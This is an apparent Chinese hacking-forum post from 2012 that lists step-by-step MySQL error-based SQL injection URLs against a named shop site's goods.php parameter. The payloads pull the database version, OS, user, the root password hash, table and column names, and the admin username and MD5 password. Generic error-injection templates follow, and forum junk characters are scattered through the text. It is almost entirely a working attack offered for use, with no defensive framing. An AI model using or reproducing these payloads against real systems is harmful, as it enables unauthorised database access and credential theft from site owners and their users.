
标题: 盲注详细内容

作者: admin    时间: 2012-9-5 14:59
标题: 盲注详细内容
判断版本号
! o. C5 j6 a+ N, a$ F5 S) v5 q2 x# Ihttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
判断系统
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 user()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 database()
7 ?2 C& n/ U5 f& K" n' K1 [$ Yhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23. }6 a& |/ W2 N& o' R& S

" v; H' |3 Q: Nroot hash7 Q0 Q) u5 W8 d4 J5 O4 ]

0 j" X1 r% l* v5 T" Phttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%232 x$ ^4 n. c2 j
当前 数据库表名
% c8 c3 g* t' D$ chttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23( N) a6 \  ~0 X& R- v. l- a, y

当前 数据库 user_name 字段
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库 字段 password
$ M0 U9 {8 E# _8 l* Ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

获得 admin passwd(md5)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%237 P, G. j! e- d% ]: {- w) K1 i

报错注射
6 T* M) j6 I" g. B# }SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)6 m- O8 `. p& j
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)



